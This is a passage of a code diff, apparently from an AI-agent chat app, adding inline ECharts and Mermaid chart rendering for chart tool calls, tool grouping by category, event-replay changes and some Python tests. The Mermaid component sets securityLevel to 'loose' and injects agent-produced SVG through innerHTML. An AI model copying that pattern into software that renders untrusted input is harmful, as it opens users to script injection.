-              <Check className="w-2.5 h-2.5" />
-              {p.name}
-              {p.count > 1 && (
-                <span className="text-[10px] opacity-80">×{p.count}</span>
-              )}
-            </span>
-          );
-        })}
+    <div className="flex flex-col gap-0.5">
+      <div className="flex gap-3 pl-10">
+        <div className="flex flex-wrap items-center gap-1.5">
+          {runningPills.map((p) => {
+            const hex = toolHex(p.name);
+            return (
+              <span
+                key={`run-${p.name}`}
+                className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
+                style={{
+                  color: hex,
+                  backgroundColor: `${hex}18`,
+                  border: `1px solid ${hex}35`,
+                }}
+              >
+                <Loader2 className="w-2.5 h-2.5 animate-spin" />
+                {p.name}
+                {p.count > 1 && (
+                  <span className="text-[10px] font-medium opacity-70">
+                    ×{p.count}
+                  </span>
+                )}
+              </span>
+            );
+          })}
+          {donePills.map((p) => {
+            const hex = toolHex(p.name);
+            return (
+              <span
+                key={`done-${p.name}`}
+                className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
+                style={{
+                  color: hex,
+                  backgroundColor: `${hex}18`,
+                  border: `1px solid ${hex}35`,
+                }}
+              >
+                <Check className="w-2.5 h-2.5" />
+                {p.name}
+                {p.count > 1 && (
+                  <span className="text-[10px] opacity-80">×{p.count}</span>
+                )}
+              </span>
+            );
+          })}
+        </div>
      </div>
+      {chartDetails.map((t, idx) => (
+        <ChartToolDetail
+          key={t.callKey ?? `${t.name}-${idx}`}
+          entry={t}
+        />
+      ))}
    </div>
  );
 }
@@ -8,7 +8,7 @@ import {
  Wrench,
  AlertCircle,
 } from "lucide-react";
-import type { ToolMeta, McpServerTools } from "@/api/queens";
+import type { ToolMeta, McpServerTools, ToolCategory } from "@/api/queens";

 /** Shape every Tools section (Queen / Colony) shares. */
 export interface ToolsSnapshot {
@@ -17,11 +17,86 @@ export interface ToolsSnapshot {
  lifecycle: ToolMeta[];
  synthetic: ToolMeta[];
  mcp_servers: McpServerTools[];
+  /** Optional: curated category groupings (queens only today). When
+   * present, tools that belong to a category are grouped under that
+   * category instead of their MCP server. */
+  categories?: ToolCategory[];
  /** Optional: when true, the allowlist came from the role-based
   * default (no explicit save). Only queens surface this today. */
  is_role_default?: boolean;
 }

+type ToolWithEnabled = ToolMeta & { enabled: boolean };
+
+interface RenderGroup {
+  /** Stable key for expansion state and React keys. */
+  key: string;
+  /** Display title shown in the collapsible header. */
+  title: string;
+  tools: ToolWithEnabled[];
+}
+
+/** Snake_case / kebab-case → Title Case for category labels so they
+ * read naturally next to MCP server names. */
+function formatCategoryTitle(name: string): string {
+  return name
+    .split(/[_-]+/)
+    .filter((w) => w.length > 0)
+    .map((w) => w.charAt(0).toUpperCase() + w.slice(1))
+    .join(" ");
+}
+
+/** Build display groups with the priority: category → MCP server → "Other tools".
+ * A tool that belongs to multiple categories lands in the first one (input order). */
+function buildGroups(
+  mcpServers: McpServerTools[],
+  categories: ToolCategory[] | undefined,
+): RenderGroup[] {
+  const toolCategory = new Map<string, string>();
+  categories?.forEach((cat) => {
+    cat.tools.forEach((toolName) => {
+      if (!toolCategory.has(toolName)) toolCategory.set(toolName, cat.name);
+    });
+  });
+
+  const groupMap = new Map<string, RenderGroup>();
+  // Pre-seed category groups in their original order so categories
+  // come before MCP servers regardless of which tool we encounter first.
+  categories?.forEach((cat) => {
+    groupMap.set(`cat:${cat.name}`, {
+      key: `cat:${cat.name}`,
+      title: formatCategoryTitle(cat.name),
+      tools: [],
+    });
+  });
+
+  mcpServers.forEach((srv) => {
+    srv.tools.forEach((t) => {
+      const cat = toolCategory.get(t.name);
+      let key: string;
+      let title: string;
+      if (cat) {
+        key = `cat:${cat}`;
+        title = formatCategoryTitle(cat);
+      } else if (srv.name && srv.name !== "(unknown)") {
+        key = `srv:${srv.name}`;
+        title = formatCategoryTitle(srv.name);
+      } else {
+        key = "other";
+        title = "Other tools";
+      }
+      let group = groupMap.get(key);
+      if (!group) {
+        group = { key, title, tools: [] };
+        groupMap.set(key, group);
+      }
+      group.tools.push(t);
+    });
+  });
+
+  return Array.from(groupMap.values()).filter((g) => g.tools.length > 0);
+}
+
 export interface ToolsEditorProps {
  /** Stable identifier — refetches when it changes. */
  subjectKey: string;
@@ -219,6 +294,11 @@ export default function ToolsEditor({
    return s;
  }, [data]);

+  const groups = useMemo(
+    () => (data ? buildGroups(data.mcp_servers, data.categories) : []),
+    [data],
+  );
+
  const dirty = useMemo(() => {
    const a = draftAllowed;
    const b = baselineRef.current;
@@ -401,10 +481,10 @@ export default function ToolsEditor({
        </CollapsibleGroup>
      )}

-      {data.mcp_servers.map((srv) => {
-        const toolNames = srv.tools.map((t) => t.name);
+      {groups.map((group) => {
+        const toolNames = group.tools.map((t) => t.name);
        const state = triStateForServer(toolNames, draftAllowed);
-        const enabledInServer =
+        const enabledInGroup =
          draftAllowed === null
            ? toolNames.length
            : toolNames.reduce(
@@ -413,13 +493,13 @@ export default function ToolsEditor({
              );
        return (
          <CollapsibleGroup
-            key={srv.name}
-            title={srv.name === "(unknown)" ? "MCP Tools" : srv.name}
-            count={srv.tools.length}
-            badge={`${enabledInServer}/${srv.tools.length}`}
-            expanded={!!expanded[srv.name]}
+            key={group.key}
+            title={group.title}
+            count={group.tools.length}
+            badge={`${enabledInGroup}/${group.tools.length}`}
+            expanded={!!expanded[group.key]}
            onToggle={() =>
-              setExpanded((p) => ({ ...p, [srv.name]: !p[srv.name] }))
+              setExpanded((p) => ({ ...p, [group.key]: !p[group.key] }))
            }
            leading={
              <TriStateCheckbox
@@ -429,12 +509,12 @@ export default function ToolsEditor({
            }
          >
            <div className="flex flex-col">
-              {srv.tools.map((t) => {
+              {group.tools.map((t) => {
                const enabled =
                  draftAllowed === null ? true : draftAllowed.has(t.name);
                return (
                  <ToolRow
-                    key={`${srv.name}-${t.name}`}
+                    key={`${group.key}-${t.name}`}
                    name={t.name}
                    description={t.description}
                    enabled={enabled}
@@ -0,0 +1,158 @@
+/**
+ * Per-call detail row for ``chart_*`` tool calls.
+ *
+ * The canonical embedding mechanism: when the agent invokes
+ * ``chart_render``, the runtime stores the result envelope in
+ * ``events.jsonl``; ``chat-helpers.replayEvent`` retains it and the
+ * chat panel dispatches it here. We read ``result.spec`` and mount
+ * the live renderer; ``result.file_url`` becomes the download link.
+ *
+ * Rules baked in:
+ *   - The chart is reconstructed FROM THE TOOL RESULT, not from any
+ *     markdown fence the agent might have written. Calling the tool
+ *     IS the embedding — there's nothing else to remember.
+ *   - The chart survives session reload because the spec lives in
+ *     events.jsonl alongside the tool_call_completed event.
+ *   - The downloadable PNG lives at ``result.file_url`` (a ``file://``
+ *     URI on the runtime host). The web frontend can't open file://
+ *     directly; we surface ``file_path`` as text and give a Copy
+ *     button so the user can paste it into a file manager. (The
+ *     desktop renderer has an Electron IPC bridge — not available
+ *     in OSS.)
+ */
+
+import { lazy, Suspense, useState } from "react";
+import { Copy, Loader2, Check } from "lucide-react";
+
+// Lazy chunks so non-chart messages don't drag in echarts/mermaid.
+const EChartsBlock = lazy(() => import("./EChartsBlock"));
+const MermaidBlock = lazy(() => import("./MermaidBlock"));
+
+export interface ChartToolEntry {
+  name: string;
+  done: boolean;
+  args?: unknown;
+  result?: unknown;
+  isError?: boolean;
+  callKey?: string;
+}
+
+interface ChartResult {
+  kind?: "echarts" | "mermaid";
+  spec?: unknown;
+  file_path?: string;
+  file_url?: string;
+  title?: string;
+  error?: string;
+  // Width/height come back from the server tool but are NOT displayed
+  // in the footer. Kept here so the live in-chat render can match the
+  // spec's native aspect ratio instead of forcing a 16:9 box that
+  // clips wide dashboards.
+  width?: number;
+  height?: number;
+}
+
+function asResult(v: unknown): ChartResult {
+  if (v && typeof v === "object") return v as ChartResult;
+  return {};
+}
+
+export default function ChartToolDetail({ entry }: { entry: ChartToolEntry }) {
+  const [copyState, setCopyState] = useState<"idle" | "copied">("idle");
+
+  // Still running: show a tiny inline spinner. Charts render fast (a
+  // few hundred ms), so a full skeleton would flash and feel janky.
+  if (!entry.done) {
+    return (
+      <div className="pl-10 mt-1.5">
+        <div className="flex items-center gap-2 text-[11px] text-muted-foreground">
+          <Loader2 className="w-3 h-3 animate-spin shrink-0" />
+          <span>rendering chart…</span>
+        </div>
+      </div>
+    );
+  }
+
+  const result = asResult(entry.result);
+
+  if (result.error) {
+    // Errors are intentionally NOT shown to the user — the agent sees
+    // them in the tool result envelope and is expected to retry with a
+    // fixed spec.
+    return null;
+  }
+
+  const kind = result.kind;
+  const spec = result.spec;
+  if (!kind || spec === undefined) {
+    return null;
+  }
+
+  const handleCopyPath = async () => {
+    if (!result.file_path) return;
+    try {
+      await navigator.clipboard.writeText(result.file_path);
+      setCopyState("copied");
+      window.setTimeout(() => setCopyState("idle"), 2000);
+    } catch {
+      // Clipboard API unavailable (insecure context); silently no-op.
+    }
+  };
+
+  // Honor the spec's native aspect ratio when both dimensions are
+  // known (the server tool always returns them).
+  const aspectRatio =
+    result.width && result.height ? result.width / result.height : undefined;
+
+  return (
+    <div className="pl-10 mt-1.5 max-w-5xl">
+      <Suspense
+        fallback={
+          <div className="flex items-center gap-2 text-[11px] text-muted-foreground">
+            <Loader2 className="w-3 h-3 animate-spin" />
+            <span>loading chart engine…</span>
+          </div>
+        }
+      >
+        {kind === "echarts" ? (
+          <EChartsBlock spec={spec} aspectRatio={aspectRatio} />
+        ) : kind === "mermaid" ? (
+          <MermaidBlock source={typeof spec === "string" ? spec : ""} />
+        ) : (
+          <div className="text-[11px] text-muted-foreground">
+            unknown chart kind: {String(kind)}
+          </div>
+        )}
+      </Suspense>
+
+      {/* Footer: title + path-copy. The PNG lives on the runtime host;
+          web browsers can't open file:// URIs from a hosted page, so
+          we surface the path as a copyable string instead of a fake
+          Download button. */}
+      <div className="flex items-center justify-between mt-2 px-1 text-[10.5px] text-muted-foreground/80">
+        <span className="truncate min-w-0 flex-1">
+          {result.title || kind}
+        </span>
+        {result.file_path && (
+          <button
+            type="button"
+            onClick={handleCopyPath}
+            className="inline-flex items-center gap-1 hover:text-foreground transition shrink-0 cursor-pointer"
+            title={
+              copyState === "copied"
+                ? "Copied to clipboard"
+                : `Copy path: ${result.file_path}`
+            }
+          >
+            {copyState === "copied" ? (
+              <Check className="w-3 h-3 text-primary" />
+            ) : (
+              <Copy className="w-3 h-3" />
+            )}
+            {copyState === "copied" ? "Copied" : "Copy path"}
+          </button>
+        )}
+      </div>
+    </div>
+  );
+}
@@ -0,0 +1,232 @@
+/**
+ * Live ECharts renderer for the chat bubble.
+ *
+ * Mounts an ECharts instance into a sized div and feeds it the spec
+ * the agent passed to `chart_render`. The same spec is rendered
+ * server-side to a PNG; the live render is the in-chat experience,
+ * the PNG is the downloadable.
+ *
+ * - Lazy-loaded via dynamic import so non-chart messages don't pay
+ *   the ~1 MB bundle cost.
+ * - SVG renderer (`{ renderer: 'svg' }`) for crisp scaling and lower
+ *   memory than canvas. Looks identical at chat-bubble sizes.
+ * - Resize handled via ResizeObserver; charts adapt to the bubble's
+ *   width while keeping a fixed aspect ratio.
+ * - Error boundary inside the component itself: invalid specs render
+ *   a tiny "spec invalid" pill with a copy-spec button so the agent
+ *   can self-correct on the next turn.
+ */
+
+import { useEffect, useRef, useState } from "react";
+import { AlertCircle } from "lucide-react";
+import { buildOpenHiveTheme } from "./openhiveTheme";
+
+interface Props {
+  spec: unknown;
+  /** Aspect ratio kept while the width adapts to the bubble. Defaults
+   * to 16:9 — the standard chart shape that fits in slide decks. */
+  aspectRatio?: number;
+  /** Hard cap on rendered height (px). Prevents very-tall charts from
+   * dominating the chat scroll. */
+  maxHeight?: number;
+}
+
+const _themeRegistered: Record<"light" | "dark", boolean> = {
+  light: false,
+  dark: false,
+};
+
+/**
+ * Detect the user's current UI theme from the DOM. The OpenHive
+ * desktop app applies a `dark` class to <html> in dark mode (see
+ * index.css). We use the same signal here so the live chart matches
+ * the surrounding chat — neither the agent nor the caller picks the
+ * theme, and the PNG download is rendered server-side from the same
+ * source of truth (HIVE_DESKTOP_THEME env, set by Electron from
+ * nativeTheme.shouldUseDarkColors).
+ */
+function useDocumentTheme(): "light" | "dark" {
+  const [theme, setTheme] = useState<"light" | "dark">(() =>
+    document.documentElement.classList.contains("dark") ? "dark" : "light",
+  );
+  useEffect(() => {
+    const obs = new MutationObserver(() => {
+      setTheme(
+        document.documentElement.classList.contains("dark") ? "dark" : "light",
+      );
+    });
+    obs.observe(document.documentElement, {
+      attributes: true,
+      attributeFilter: ["class"],
+    });
+    return () => obs.disconnect();
+  }, []);
+  return theme;
+}
+
+export default function EChartsBlock({
+  spec,
+  aspectRatio = 16 / 9,
+  maxHeight = 480,
+}: Props) {
+  const containerRef = useRef<HTMLDivElement>(null);
+  const chartRef = useRef<unknown>(null); // echarts.ECharts instance, kept untyped to avoid coupling the type import
+  const [error, setError] = useState<string | null>(null);
+  // Theme follows the user's OpenHive UI mode automatically. Same
+  // signal feeds the server-side PNG render via HIVE_DESKTOP_THEME, so
+  // live chart and downloaded file always match.
+  const theme = useDocumentTheme();
+
+  useEffect(() => {
+    if (!containerRef.current) return;
+    let disposed = false;
+    let resizeObserver: ResizeObserver | null = null;
+
+    (async () => {
+      try {
+        const echarts = await import("echarts");
+        if (disposed || !containerRef.current) return;
+        // Register the OpenHive brand theme once per (theme, mode) so
+        // bar/line/etc. inherit our palette + cozy spacing instead of
+        // ECharts' generic-web-2010 defaults. Theme matches the
+        // server-side render via tools/src/chart_tools/theme.py.
+        const themeName = theme === "dark" ? "openhive-dark" : "openhive-light";
+        if (!_themeRegistered[theme]) {
+          echarts.registerTheme(themeName, buildOpenHiveTheme(theme));
+          _themeRegistered[theme] = true;
+        }
+        // Coerce string specs to objects (defensive — the agent should
+        // pass dicts but LLMs sometimes serialize before sending).
+        let parsedSpec: Record<string, unknown>;
+        if (typeof spec === "string") {
+          try {
+            parsedSpec = JSON.parse(spec);
+          } catch {
+            throw new Error("spec is a string and not valid JSON");
+          }
+        } else {
+          parsedSpec = spec as Record<string, unknown>;
+        }
+
+        // Disjoint-region layout policy. ECharts has no auto-layout
+        // for component overlap (verified against the option ref):
+        // title/legend/grid are absolutely positioned and ignore each
+        // other. We enforce three non-overlapping regions:
+        //   - Title: anchored to TOP (top:16, no bottom)
+        //   - Legend: anchored to BOTTOM (bottom:16, no top) except
+        //     when orient:'vertical' (side legend stays where placed)
+        //   - Grid: middle, with containLabel for axis labels
+        // Strips user-supplied vertical positions so an agent spec
+        // like `legend.top:"8%"` (which lands inside the title at
+        // chat-bubble dimensions — the 2026-05-01 bug) can't collide.
+        // Horizontal anchoring is preserved so left-aligned legends
+        // still work. Must mirror chart_tools/renderer.py exactly so
+        // the live chart and downloaded PNG look the same.
+        const userTitle = (parsedSpec.title as Record<string, unknown> | undefined) ?? {};
+        const userLegend = parsedSpec.legend as Record<string, unknown> | undefined;
+        const userGrid = (parsedSpec.grid as Record<string, unknown> | undefined) ?? {};
+        const legendVertical = userLegend?.orient === "vertical";
+        const stripV = (o: Record<string, unknown>) => {
+          const c = { ...o };
+          delete c.top;
+          delete c.bottom;
+          return c;
+        };
+        const normalizedSpec: Record<string, unknown> = {
+          ...parsedSpec,
+          title: { left: "center", ...stripV(userTitle), top: 16 },
+          grid: {
+            left: 56,
+            right: 56,
+            ...stripV(userGrid),
+            // Force vertical bounds — user-supplied grid.top/bottom
+            // (often percentage strings like "8%" the agent picks at
+            // default dims) don't generalize across chat-bubble sizes.
+            // 96 covers: bottom legend (~36) + xAxis name (containLabel
+            // handles tick labels but NOT axis name; outerBoundsMode is
+            // v6+ and we're on v5). 40 when no legend.
+            top: 64,
+            bottom: userLegend && !legendVertical ? 96 : 40,
+            containLabel: true,
+          },
+        };
+        if (userLegend) {
+          const legendDefaults = {
+            icon: "roundRect",
+            itemWidth: 12,
+            itemHeight: 12,
+            itemGap: 16,
+          };
+          normalizedSpec.legend = legendVertical
+            ? { ...legendDefaults, ...userLegend }
+            : { ...legendDefaults, ...stripV(userLegend), bottom: 16 };
+        }
+
+        // Fresh chart instance per spec; cheaper than reuse + setOption
+        // for our sizes and avoids stale state between specs.
+        const chart = echarts.init(containerRef.current, themeName, {
+          renderer: "svg",
+        });
+        chartRef.current = chart;
+        chart.setOption(normalizedSpec, {
+          notMerge: true,
+          lazyUpdate: false,
+        });
+
+        // Resize on container size change.
+        resizeObserver = new ResizeObserver(() => {
+          if (chartRef.current && containerRef.current) {
+            (chartRef.current as { resize: () => void }).resize();
+          }
+        });
+        resizeObserver.observe(containerRef.current);
+      } catch (e) {
+        if (!disposed) {
+          setError(e instanceof Error ? e.message : String(e));
+        }
+      }
+    })();
+
+    return () => {
+      disposed = true;
+      if (resizeObserver) resizeObserver.disconnect();
+      if (chartRef.current) {
+        try {
+          (chartRef.current as { dispose: () => void }).dispose();
+        } catch {
+          // best-effort cleanup
+        }
+        chartRef.current = null;
+      }
+    };
+  }, [spec, theme]);
+
+  if (error) {
+    return (
+      <div
+        className="flex items-center gap-2 text-[11px] text-muted-foreground px-2.5 py-1.5 rounded-md border border-border/40 bg-muted/30"
+        role="alert"
+      >
+        <AlertCircle className="w-3 h-3 shrink-0" />
+        <span>chart spec invalid: {error}</span>
+      </div>
+    );
+  }
+
+  return (
+    <div
+      ref={containerRef}
+      // Transparent background so the chart blends with the chat bubble
+      // instead of sitting in an obtrusive white card. The OpenHive
+      // ECharts theme also sets backgroundColor: 'transparent' so the
+      // chart itself is see-through. Subtle rounded corners only.
+      className="w-full rounded-lg bg-transparent"
+      style={{
+        // Reserve aspect-ratio space so the chart doesn't pop in.
+        // ECharts will overwrite the inline style as it lays out.
+        aspectRatio,
+        maxHeight,
+      }}
+    />
+  );
+}
@@ -0,0 +1,81 @@
+/**
+ * Live Mermaid renderer for the chat bubble.
+ *
+ * Renders a mermaid source string to an inline SVG. Mermaid is
+ * lazy-loaded so non-diagram messages don't pay the ~600 KB cost.
+ *
+ * Theme follows the OpenHive light/dark setting. Errors render a
+ * tiny pill so the agent gets feedback for the next turn.
+ */
+
+import { useEffect, useRef, useState } from "react";
+import { AlertCircle } from "lucide-react";
+
+interface Props {
+  source: string;
+  theme?: "light" | "dark";
+}
+
+let _mermaidInitialized = false;
+
+export default function MermaidBlock({ source, theme = "light" }: Props) {
+  const ref = useRef<HTMLDivElement>(null);
+  const [error, setError] = useState<string | null>(null);
+
+  useEffect(() => {
+    let disposed = false;
+
+    (async () => {
+      try {
+        const mermaid = (await import("mermaid")).default;
+        if (!_mermaidInitialized) {
+          mermaid.initialize({
+            startOnLoad: false,
+            theme: theme === "dark" ? "dark" : "default",
+            securityLevel: "loose",
+            fontFamily:
+              "'Inter Tight', -apple-system, BlinkMacSystemFont, system-ui, sans-serif",
+          });
+          _mermaidInitialized = true;
+        }
+        if (disposed || !ref.current) return;
+
+        // Unique id per render to avoid conflicting injected styles.
+        const id = `mmd-${Math.random().toString(36).slice(2, 10)}`;
+        const { svg } = await mermaid.render(id, source);
+        if (disposed || !ref.current) return;
+        ref.current.innerHTML = svg;
+      } catch (e) {
+        if (!disposed) {
+          setError(e instanceof Error ? e.message : String(e));
+        }
+      }
+    })();
+
+    return () => {
+      disposed = true;
+    };
+  }, [source, theme]);
+
+  if (error) {
+    return (
+      <div
+        className="flex items-center gap-2 text-[11px] text-muted-foreground px-2.5 py-1.5 rounded-md border border-border/40 bg-muted/30"
+        role="alert"
+      >
+        <AlertCircle className="w-3 h-3 shrink-0" />
+        <span>diagram syntax invalid: {error}</span>
+      </div>
+    );
+  }
+
+  return (
+    <div
+      ref={ref}
+      // Match EChartsBlock: transparent so the diagram blends with the
+      // chat bubble; rounded corners and inner padding give breathing
+      // room without adding a visible card.
+      className="w-full overflow-x-auto rounded-lg bg-transparent p-4 [&_svg]:max-w-full [&_svg]:h-auto [&_svg]:mx-auto"
+    />
+  );
+}
@@ -0,0 +1,131 @@
+/**
+ * OpenHive ECharts theme — must stay in sync with
+ * tools/src/chart_tools/theme.py on the runtime side.
+ *
+ * Same palette + spacing both for the live in-chat ECharts mount
+ * (see EChartsBlock.tsx) and the headless server-side render that
+ * produces the downloadable PNG. Without this both diverge: the chat
+ * shows ECharts default colors and the PNG shows OpenHive colors,
+ * confusing the user.
+ */
+
+const PALETTE_LIGHT = [
+  "#db6f02", // honey orange (primary)
+  "#456a8d", // slate blue
+  "#3d7a4a", // sage green
+  "#a8453d", // terracotta brick
+  "#c48820", // warm bronze
+  "#5d5b88", // indigo
+  "#7d6b51", // olive
+  "#8e4200", // rust
+];
+
+const PALETTE_DARK = [
+  "#ffb825",
+  "#7ba2c4",
+  "#7bb285",
+  "#d97470",
+  "#e0a83a",
+  "#9892c4",
+  "#b8a685",
+  "#d97e3a",
+];
+
+export function buildOpenHiveTheme(theme: "light" | "dark" = "light") {
+  const isDark = theme === "dark";
+  const fg = isDark ? "#e8e6e0" : "#1a1a1a";
+  const fgMuted = isDark ? "#8a8a8a" : "#6b6b6b";
+  const gridLine = isDark ? "#2a2724" : "#ebe9e2";
+  const axisLine = isDark ? "#3a3733" : "#d0cfca";
+  const tooltipBg = isDark ? "#181715" : "#ffffff";
+  const tooltipBorder = isDark ? "#2a2724" : "#d0cfca";
+  const palette = isDark ? PALETTE_DARK : PALETTE_LIGHT;
+
+  return {
+    color: palette,
+    backgroundColor: "transparent",
+    textStyle: {
+      fontFamily:
+        '"Inter Tight", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif',
+      color: fg,
+      fontSize: 12,
+    },
+    title: {
+      left: "center",
+      top: 28,
+      textStyle: { color: fg, fontSize: 16, fontWeight: 600 },
+      subtextStyle: { color: fgMuted, fontSize: 12 },
+    },
+    legend: {
+      top: 64,
+      icon: "roundRect",
+      itemWidth: 12,
+      itemHeight: 12,
+      itemGap: 20,
+      textStyle: { color: fgMuted, fontSize: 12 },
+    },
+    grid: {
+      top: 116,
+      left: 48,
+      right: 48,
+      bottom: 72,
+      containLabel: true,
+    },
+    categoryAxis: {
+      axisLine: { show: true, lineStyle: { color: axisLine } },
+      axisTick: { show: false },
+      axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
+      splitLine: { show: false },
+      nameLocation: "middle",
+      nameGap: 36,
+      nameTextStyle: { color: fgMuted, fontSize: 12 },
+    },
+    valueAxis: {
+      axisLine: { show: false },
+      axisTick: { show: false },
+      axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
+      splitLine: { lineStyle: { color: gridLine, type: "dashed" } },
+      nameLocation: "middle",
+      nameGap: 42,
+      nameTextStyle: { color: fgMuted, fontSize: 12, fontWeight: 500 },
+      // Don't auto-rotate value-axis names — the theme can't tell xAxis
+      // (horizontal bar) from yAxis (vertical bar), so rotating both at
+      // 90° vertical-mounts the xAxis name on horizontal-bar charts and
+      // it collides with the legend (peer_val regression). Let specs
+      // set nameRotate explicitly when they want a vertical y-name.
+    },
+    timeAxis: {
+      axisLine: { show: true, lineStyle: { color: axisLine } },
+      axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
+      splitLine: { show: false },
+      nameLocation: "middle",
+      nameGap: 36,
+      nameTextStyle: { color: fgMuted, fontSize: 12 },
+    },
+    tooltip: {
+      backgroundColor: tooltipBg,
+      borderColor: tooltipBorder,
+      borderWidth: 1,
+      padding: [8, 12],
+      textStyle: { color: fg, fontSize: 12 },
+      axisPointer: {
+        lineStyle: { color: axisLine, type: "dashed" },
+        crossStyle: { color: axisLine },
+      },
+    },
+    bar: { itemStyle: { borderRadius: [3, 3, 0, 0] } },
+    line: {
+      lineStyle: { width: 2.5 },
+      symbol: "circle",
+      symbolSize: 6,
+    },
+    candlestick: {
+      itemStyle: {
+        color: "#3d7a4a",
+        color0: "#a8453d",
+        borderColor: "#3d7a4a",
+        borderColor0: "#a8453d",
+      },
+    },
+  };
+}
@@ -295,12 +295,40 @@ export function sseEventToChatMessage(
 * deferred `tool_call_completed` events can find the exact pill they belong
 * to after the turn counter moves on.
 */
+/**
+ * For chart_* tools we retain the args (from tool_call_started) and
+ * result envelope (from tool_call_completed) so the chat panel can
+ * render the live chart inline from the same spec the runtime
+ * rasterized to PNG. Other tools omit these fields to keep the
+ * tool_status content payload small (catalogs are pill-only).
+ */
+type ToolEntry = {
+  name: string;
+  done: boolean;
+  /** opaque per-call id surfaced to the UI; used to key React rows */
+  callKey?: string;
+  /** present only for tools whose name matches shouldRetainDetail */
+  args?: unknown;
+  result?: unknown;
+  isError?: boolean;
+};
+
 type ToolRowState = {
  streamId: string;
  executionId: string;
-  tools: Record<string, { name: string; done: boolean }>;
+  tools: Record<string, ToolEntry>;
 };

+/**
+ * Names whose detail (args + result envelope) we surface in the chat.
+ * Other tools stay pill-only — keeping their args/results out of the
+ * message content avoids ballooning the chat history with tool
+ * catalogs, file blobs, etc.
+ */
+function shouldRetainDetail(toolName: string): boolean {
+  return toolName.startsWith("chart_");
+}
+
 export interface ReplayState {
  turnCounters: Record<string, number>;
  toolRows: Record<string, ToolRowState>;
@@ -349,10 +377,20 @@ function toolLookupKey(
 }

 function toolRowContent(row: ToolRowState): string {
-  const tools = Object.values(row.tools).map((t) => ({
-    name: t.name,
-    done: t.done,
-  }));
+  const tools = Object.values(row.tools).map((t) => {
+    const out: ToolEntry = { name: t.name, done: t.done };
+    // Carry callKey + retained fields only for tools whose detail the
+    // UI mounts (chart_*). Pill-only tools stay terse so the
+    // tool_status payload doesn't grow with every catalog/file_ops
+    // call and existing snapshot tests stay valid.
+    if (shouldRetainDetail(t.name)) {
+      if (t.callKey !== undefined) out.callKey = t.callKey;
+      if (t.args !== undefined) out.args = t.args;
+      if (t.result !== undefined) out.result = t.result;
+      if (t.isError !== undefined) out.isError = t.isError;
+    }
+    return out;
+  });
  const allDone = tools.length > 0 && tools.every((t) => t.done);
  return JSON.stringify({ tools, allDone });
 }
@@ -417,10 +455,19 @@ export function replayEvent(
          tools: {},
        });
      const toolKey = toolUseId || `anonymous-${Object.keys(row.tools).length}`;
-      row.tools[toolKey] = {
+      const entry: ToolEntry = {
        name: toolName,
        done: false,
+        callKey: toolKey,
      };
+      // Capture args at start for retained-detail tools so the chat
+      // can show what the agent rendered. Other tools' arguments are
+      // intentionally dropped to keep the tool_status JSON small.
+      if (shouldRetainDetail(toolName)) {
+        const toolInput = event.data?.tool_input;
+        if (toolInput !== undefined) entry.args = toolInput;
+      }
+      row.tools[toolKey] = entry;
      if (toolUseId) {
        state.toolUseToPill[toolLookupKey(streamId, event.execution_id, toolUseId)] = {
          msgId: pillId,
@@ -453,10 +500,38 @@ export function replayEvent(
      if (!tracked) break;
      const row = state.toolRows[tracked.msgId];
      if (!row) break;
-      row.tools[tracked.toolKey] = {
-        name: row.tools[tracked.toolKey]?.name || tracked.name,
+      const prior = row.tools[tracked.toolKey];
+      const completedName = prior?.name || tracked.name;
+      const completed: ToolEntry = {
+        name: completedName,
        done: true,
+        callKey: tracked.toolKey,
      };
+      // Preserve any args captured at start; capture the result
+      // envelope for retained-detail tools (chart_* needs spec/file_url
+      // to mount the live chart).
+      if (shouldRetainDetail(completedName)) {
+        if (prior?.args !== undefined) completed.args = prior.args;
+        const rawResult = event.data?.result;
+        if (rawResult !== undefined) {
+          // The framework serializes envelopes as JSON strings. Try to
+          // parse so the renderer can pick fields cheaply; fall back to
+          // the raw value when parsing fails (already-an-object or
+          // non-JSON string).
+          if (typeof rawResult === "string") {
+            try {
+              completed.result = JSON.parse(rawResult);
+            } catch {
+              completed.result = rawResult;
+            }
+          } else {
+            completed.result = rawResult;
+          }
+        }
+        const isErr = event.data?.is_error;
+        if (typeof isErr === "boolean") completed.isError = isErr;
+      }
+      row.tools[tracked.toolKey] = completed;
      out.push({
        id: tracked.msgId,
        agent: effectiveName || event.node_id || "Agent",
@@ -60,6 +60,21 @@ _HIVE_PATH_NAMES = (
 )


+@pytest.fixture(autouse=True)
+def _no_seed_mcp_defaults(monkeypatch):
+    """Skip bundled-server seeding in MCPRegistry.initialize() for tests.
+
+    Production wants ``initialize()`` to seed ``hive_tools`` / ``gcu-tools``
+    / ``files-tools`` / ``terminal-tools`` / ``chart-tools`` so a fresh
+    HIVE_HOME comes up with working defaults. Tests want a deterministic
+    empty registry — every assertion about counts, "no servers installed"
+    output, or first-element identity breaks otherwise. Patching here
+    keeps the production API clean and avoids a test-only flag on
+    ``initialize()``.
+    """
+    monkeypatch.setattr(_mcp_registry.MCPRegistry, "_seed_defaults", lambda self: [])
+
+
@pytest.fixture(autouse=True)
 def _isolate_hive_home_autouse(tmp_path, monkeypatch):
    """Per-test isolation of ``~/.hive`` to ``tmp_path/.hive``.
@@ -0,0 +1,73 @@
+"""Tests for the Antigravity Gemini schema sanitizer.
+
+Run with:
+    cd core
+    pytest tests/test_antigravity_schema.py -v
+"""
+
+import pytest
+
+from framework.llm.antigravity import _sanitize_schema_for_gemini
+
+
+def test_union_with_null_becomes_nullable():
+    assert _sanitize_schema_for_gemini({"type": ["string", "null"]}) == {
+        "type": "string",
+        "nullable": True,
+    }
+
+
+def test_plain_schema_passthrough():
+    assert _sanitize_schema_for_gemini({"type": "string"}) == {"type": "string"}
+
+
+def test_recurses_into_properties():
+    out = _sanitize_schema_for_gemini(
+        {
+            "type": "object",
+            "properties": {
+                "id": {"type": "integer"},
+                "owner": {"type": ["string", "null"]},
+            },
+            "required": ["id"],
+        }
+    )
+    assert out["properties"]["id"] == {"type": "integer"}
+    assert out["properties"]["owner"] == {"type": "string", "nullable": True}
+    assert out["required"] == ["id"]
+
+
+def test_recurses_into_items():
+    assert _sanitize_schema_for_gemini({"type": "array", "items": {"type": ["integer", "null"]}}) == {
+        "type": "array",
+        "items": {"type": "integer", "nullable": True},
+    }
+
+
+def test_recurses_into_combinators():
